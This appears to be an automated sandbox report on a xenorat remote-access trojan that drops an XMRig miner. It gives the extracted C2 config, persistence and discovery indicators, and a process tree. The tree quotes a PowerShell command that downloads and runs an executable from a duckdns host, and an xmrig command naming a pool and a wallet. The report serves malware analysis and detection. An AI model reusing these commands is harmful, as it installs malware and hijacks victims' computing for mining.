xenorat | 2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132

Analysis

max time kernel
153s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28-03-2024 09:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

[email protected]
Size

451KB
MD5

6614077c77a8182f0307a720071f2197
SHA1

06a06a6d02ad281942ed8b6890f099be54275bb2
SHA256

2935daeddeb1f505cea4ad368f598ab029942d91d831b71bbe4de5284c7a3132
SHA512

26b1249631b8762d332b04ccac12faf4e52a4641efa90ff0c13596715c5ef8f4eb08c4e6e32efe551ebf3a3a432a897c33eafa9980dd12eeb65213081f3d77cb
SSDEEP

12288:QLMEalqxXblqoRX5qbfphLxaO3qX+t4SJ:cqaXNabfphLxa4w4

Score

10^/10

xenorat xmrig miner rat spyware stealer trojan

Malware Config

Extracted

Family

xenorat

puredgb.duckdns.org

Mutex

Xeno_rat_nd8912d

Attributes

delay
5000
install_path
appdata
port
4444
startup_name
Fobus.exe

Signatures

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral2/files/0x0008000000023270-73.dat	family_xmrig
behavioral2/files/0x0008000000023270-73.dat	xmrig
behavioral2/memory/4556-103-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-104-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-107-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-134-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-137-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-158-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-161-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-167-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-169-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-170-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-214-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig
behavioral2/memory/4556-216-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp	xmrig

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 5 IoCs

flow	pid	Process
7	2816	powershell.exe
19	3912	powershell.exe
24	444	powershell.exe
56	4312	powershell.exe
72	1448	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	tmp.vbs
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	[email protected]
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	5.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.lnk	6.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk	5.exe

Executes dropped EXE 8 IoCs

pid	Process
3144	6.exe
2528	1.exe
4556	xmrig.exe
4516	tmp.vbs
1064	2.exe
4752	2.exe
5040	5.exe
1216	apihost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2196	schtasks.exe
3068	schtasks.exe

Delays execution with timeout.exe 37 IoCs

evasion

pid	Process
1728	timeout.exe
2668	timeout.exe
2484	timeout.exe
4908	timeout.exe
2552	timeout.exe
4952	timeout.exe
4232	timeout.exe
4516	timeout.exe
3508	timeout.exe
1104	timeout.exe
5096	timeout.exe
2248	timeout.exe
4372	timeout.exe
3472	timeout.exe
3704	timeout.exe
5096	timeout.exe
2892	timeout.exe
3492	timeout.exe
4952	timeout.exe
1408	timeout.exe
4064	timeout.exe
4848	timeout.exe
780	timeout.exe
1728	timeout.exe
2320	timeout.exe
4512	timeout.exe
2672	timeout.exe
4380	timeout.exe
1940	timeout.exe
2112	timeout.exe
5000	timeout.exe
2492	timeout.exe
3248	timeout.exe
2216	timeout.exe
3244	timeout.exe
2316	timeout.exe
564	timeout.exe

Enumerates processes with tasklist 1 TTPs 64 IoCs

Process Discovery

T1057

pid	Process
4864	tasklist.exe
1136	tasklist.exe
4696	tasklist.exe
4448	tasklist.exe
2028	tasklist.exe
5112	tasklist.exe
4140	tasklist.exe
1396	tasklist.exe
2372	tasklist.exe
1068	tasklist.exe
1208	tasklist.exe
2332	tasklist.exe
1536	tasklist.exe
2980	tasklist.exe
4400	tasklist.exe
5112	tasklist.exe
3912	tasklist.exe
1208	tasklist.exe
4952	tasklist.exe
2600	tasklist.exe
264	tasklist.exe
3100	tasklist.exe
5072	tasklist.exe
3988	tasklist.exe
4908	tasklist.exe
2180	tasklist.exe
2032	tasklist.exe
1272	tasklist.exe
3632	tasklist.exe
3608	tasklist.exe
4232	tasklist.exe
500	tasklist.exe
1456	tasklist.exe
780	tasklist.exe
2504	tasklist.exe
4176	tasklist.exe
2684	tasklist.exe
3348	tasklist.exe
3524	tasklist.exe
1560	tasklist.exe
1224	tasklist.exe
5112	tasklist.exe
1948	tasklist.exe
1912	tasklist.exe
2600	tasklist.exe
4588	tasklist.exe
4400	tasklist.exe
4932	tasklist.exe
5072	tasklist.exe
4272	tasklist.exe
2340	tasklist.exe
2528	tasklist.exe
2668	tasklist.exe
1836	tasklist.exe
3960	tasklist.exe
2308	tasklist.exe
2308	tasklist.exe
4020	tasklist.exe
4848	tasklist.exe
3020	tasklist.exe
3492	tasklist.exe
4904	tasklist.exe
2344	tasklist.exe
3676	tasklist.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	tmp.vbs
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	[email protected]
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	6.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1216	apihost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2816	powershell.exe
2816	powershell.exe
2816	powershell.exe
3912	powershell.exe
3912	powershell.exe
3912	powershell.exe
444	powershell.exe
444	powershell.exe
444	powershell.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
4752	2.exe
1448	powershell.exe
1448	powershell.exe
4752	2.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
676	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	3912	powershell.exe
Token: SeDebugPrivilege	4176	tasklist.exe
Token: SeDebugPrivilege	2600	tasklist.exe
Token: SeDebugPrivilege	2308	tasklist.exe
Token: SeLockMemoryPrivilege	4556	xmrig.exe
Token: SeLockMemoryPrivilege	4556	xmrig.exe
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	1224	tasklist.exe
Token: SeDebugPrivilege	2308	tasklist.exe
Token: SeDebugPrivilege	1272	tasklist.exe
Token: SeDebugPrivilege	3144	tasklist.exe
Token: SeDebugPrivilege	5072	tasklist.exe
Token: SeDebugPrivilege	4140	tasklist.exe
Token: SeDebugPrivilege	4020	tasklist.exe
Token: SeDebugPrivilege	1208	tasklist.exe
Token: SeDebugPrivilege	4696	tasklist.exe
Token: SeDebugPrivilege	4400	tasklist.exe
Token: SeDebugPrivilege	4448	tasklist.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	2332	tasklist.exe
Token: SeDebugPrivilege	1208	tasklist.exe
Token: SeDebugPrivilege	3632	tasklist.exe
Token: SeDebugPrivilege	4544	tasklist.exe
Token: SeDebugPrivilege	1536	tasklist.exe
Token: SeDebugPrivilege	4588	tasklist.exe
Token: SeDebugPrivilege	2748	tasklist.exe
Token: SeDebugPrivilege	4272	tasklist.exe
Token: SeDebugPrivilege	2684	tasklist.exe
Token: SeDebugPrivilege	1396	tasklist.exe
Token: SeDebugPrivilege	3068	tasklist.exe
Token: SeDebugPrivilege	3348	tasklist.exe
Token: SeDebugPrivilege	3524	tasklist.exe
Token: SeDebugPrivilege	4848	tasklist.exe
Token: SeDebugPrivilege	2332	tasklist.exe
Token: SeDebugPrivilege	500	tasklist.exe
Token: SeDebugPrivilege	2028	tasklist.exe
Token: SeDebugPrivilege	3608	tasklist.exe
Token: SeDebugPrivilege	3492	tasklist.exe
Token: SeDebugPrivilege	2980	tasklist.exe
Token: SeDebugPrivilege	1060	tasklist.exe
Token: SeDebugPrivilege	4752	2.exe
Token: SeDebugPrivilege	5112	tasklist.exe
Token: SeDebugPrivilege	4904	tasklist.exe
Token: SeDebugPrivilege	1948	tasklist.exe
Token: SeDebugPrivilege	4952	tasklist.exe
Token: SeDebugPrivilege	3988	tasklist.exe
Token: SeDebugPrivilege	4400	tasklist.exe
Token: SeDebugPrivilege	4908	tasklist.exe
Token: SeDebugPrivilege	4232	tasklist.exe
Token: SeDebugPrivilege	2180	tasklist.exe
Token: SeDebugPrivilege	5112	tasklist.exe
Token: SeDebugPrivilege	1456	tasklist.exe
Token: SeDebugPrivilege	2340	tasklist.exe
Token: SeDebugPrivilege	3912	tasklist.exe
Token: SeDebugPrivilege	444	tasklist.exe
Token: SeDebugPrivilege	2032	tasklist.exe
Token: SeDebugPrivilege	2668	tasklist.exe
Token: SeDebugPrivilege	2344	tasklist.exe
Token: SeDebugPrivilege	2372	tasklist.exe
Token: SeDebugPrivilege	1836	tasklist.exe
Token: SeDebugPrivilege	1068	tasklist.exe
Token: SeDebugPrivilege	5112	tasklist.exe
Token: SeDebugPrivilege	3100	tasklist.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4556	xmrig.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4752	2.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3172 wrote to memory of 2828	3172	[email protected]	95
PID 3172 wrote to memory of 2828	3172	[email protected]	95
PID 2828 wrote to memory of 3024	2828	WScript.exe	96
PID 2828 wrote to memory of 3024	2828	WScript.exe	96
PID 3024 wrote to memory of 2816	3024	cmd.exe	98
PID 3024 wrote to memory of 2816	3024	cmd.exe	98
PID 2816 wrote to memory of 3144	2816	powershell.exe	102
PID 2816 wrote to memory of 3144	2816	powershell.exe	102
PID 3024 wrote to memory of 3912	3024	cmd.exe	103
PID 3024 wrote to memory of 3912	3024	cmd.exe	103
PID 3144 wrote to memory of 2996	3144	6.exe	105
PID 3144 wrote to memory of 2996	3144	6.exe	105
PID 2996 wrote to memory of 4468	2996	WScript.exe	106
PID 2996 wrote to memory of 4468	2996	WScript.exe	106
PID 4468 wrote to memory of 4176	4468	cmd.exe	108
PID 4468 wrote to memory of 4176	4468	cmd.exe	108
PID 4468 wrote to memory of 1088	4468	cmd.exe	109
PID 4468 wrote to memory of 1088	4468	cmd.exe	109
PID 4468 wrote to memory of 1104	4468	cmd.exe	111
PID 4468 wrote to memory of 1104	4468	cmd.exe	111
PID 4468 wrote to memory of 3688	4468	cmd.exe	112
PID 4468 wrote to memory of 3688	4468	cmd.exe	112
PID 3688 wrote to memory of 2600	3688	cmd.exe	113
PID 3688 wrote to memory of 2600	3688	cmd.exe	113
PID 4468 wrote to memory of 3980	4468	cmd.exe	114
PID 4468 wrote to memory of 3980	4468	cmd.exe	114
PID 4468 wrote to memory of 2308	4468	cmd.exe	127
PID 4468 wrote to memory of 2308	4468	cmd.exe	127
PID 4468 wrote to memory of 4564	4468	cmd.exe	116
PID 4468 wrote to memory of 4564	4468	cmd.exe	116
PID 4468 wrote to memory of 4952	4468	cmd.exe	133
PID 4468 wrote to memory of 4952	4468	cmd.exe	133
PID 3980 wrote to memory of 1108	3980	WScript.exe	118
PID 3980 wrote to memory of 1108	3980	WScript.exe	118
PID 3912 wrote to memory of 2528	3912	powershell.exe	121
PID 3912 wrote to memory of 2528	3912	powershell.exe	121
PID 1108 wrote to memory of 4556	1108	cmd.exe	120
PID 1108 wrote to memory of 4556	1108	cmd.exe	120
PID 3024 wrote to memory of 444	3024	cmd.exe	122
PID 3024 wrote to memory of 444	3024	cmd.exe	122
PID 4468 wrote to memory of 3744	4468	cmd.exe	123
PID 4468 wrote to memory of 3744	4468	cmd.exe	123
PID 3744 wrote to memory of 1224	3744	cmd.exe	124
PID 3744 wrote to memory of 1224	3744	cmd.exe	124
PID 4468 wrote to memory of 2308	4468	cmd.exe	127
PID 4468 wrote to memory of 2308	4468	cmd.exe	127
PID 4468 wrote to memory of 2300	4468	cmd.exe	128
PID 4468 wrote to memory of 2300	4468	cmd.exe	128
PID 4468 wrote to memory of 3244	4468	cmd.exe	129
PID 4468 wrote to memory of 3244	4468	cmd.exe	129
PID 2528 wrote to memory of 1432	2528	1.exe	130
PID 2528 wrote to memory of 1432	2528	1.exe	130
PID 1432 wrote to memory of 4516	1432	cmd.exe	148
PID 1432 wrote to memory of 4516	1432	cmd.exe	148
PID 4516 wrote to memory of 4952	4516	tmp.vbs	133
PID 4516 wrote to memory of 4952	4516	tmp.vbs	133
PID 4952 wrote to memory of 1692	4952	WScript.exe	134
PID 4952 wrote to memory of 1692	4952	WScript.exe	134
PID 1692 wrote to memory of 3172	1692	cmd.exe	137
PID 1692 wrote to memory of 3172	1692	cmd.exe	137
PID 4468 wrote to memory of 3260	4468	cmd.exe	138
PID 4468 wrote to memory of 3260	4468	cmd.exe	138
PID 3260 wrote to memory of 1272	3260	cmd.exe	139
PID 3260 wrote to memory of 1272	3260	cmd.exe	139

C:\Users\Admin\AppData\Local\Temp\[email protected]
"C:\Users\Admin\AppData\Local\Temp\[email protected]"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3172
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\down.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\down.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://puredgb.duckdns.org:30000/ejr9e45s/xmr.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\6.exe'; C:\Users\Admin\AppData\Roaming\6.exe"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2816
    - - C:\Users\Admin\AppData\Roaming\6.exe
        
        "C:\Users\Admin\AppData\Roaming\6.exe"
        5⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:3144
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\winproc.vbs"
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\watch.bat" "
        7⤵
        Checks computer location settings
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4468
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4176
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1088
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3688
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2600
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Drivers\1.vbs"
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Drivers\process.bat" "
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:1108
        
        C:\ProgramData\Drivers\xmrig.exe
        
        xmrig.exe --donate-level 5 -o pool.supportxmr.com:443 -u 49LzTohDTP4MAvjfeeKB7pecfkp8MppQKZu5yjawPHfH2aJFbLhgV459XX9y3qoAmjJvxiewcw2bK2toFoMVEAQSLB878rm -k --tls -p speed
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4556
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4564
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3744
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1224
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2300
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:3244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3260
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1272
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3144
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4540
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4536
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5072
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4140
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4272
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3116
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4020
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1208
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1432
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3124
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4696
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4400
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1536
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:1728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2180
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4448
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4960
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2356
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1208
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3632
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1928
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:3124
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4544
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1536
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:4920
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:2552
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4588
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2748
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:5000
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:4512
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4272
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2684
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:1516
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:4908
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1928
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1396
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3068
        
        C:\Windows\system32\find.exe
        
        find /i "taskmgr.exe"
        8⤵
        
        PID:2168
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        8⤵
        Delays execution with timeout.exe
        
        PID:2492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        8⤵
        
        PID:1728
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "IMAGENAME eq xmrig.exe"
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3348
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /NH /FI "imagename eq taskmgr.exe"
        8⤵
        Enumerates processes with tasklist
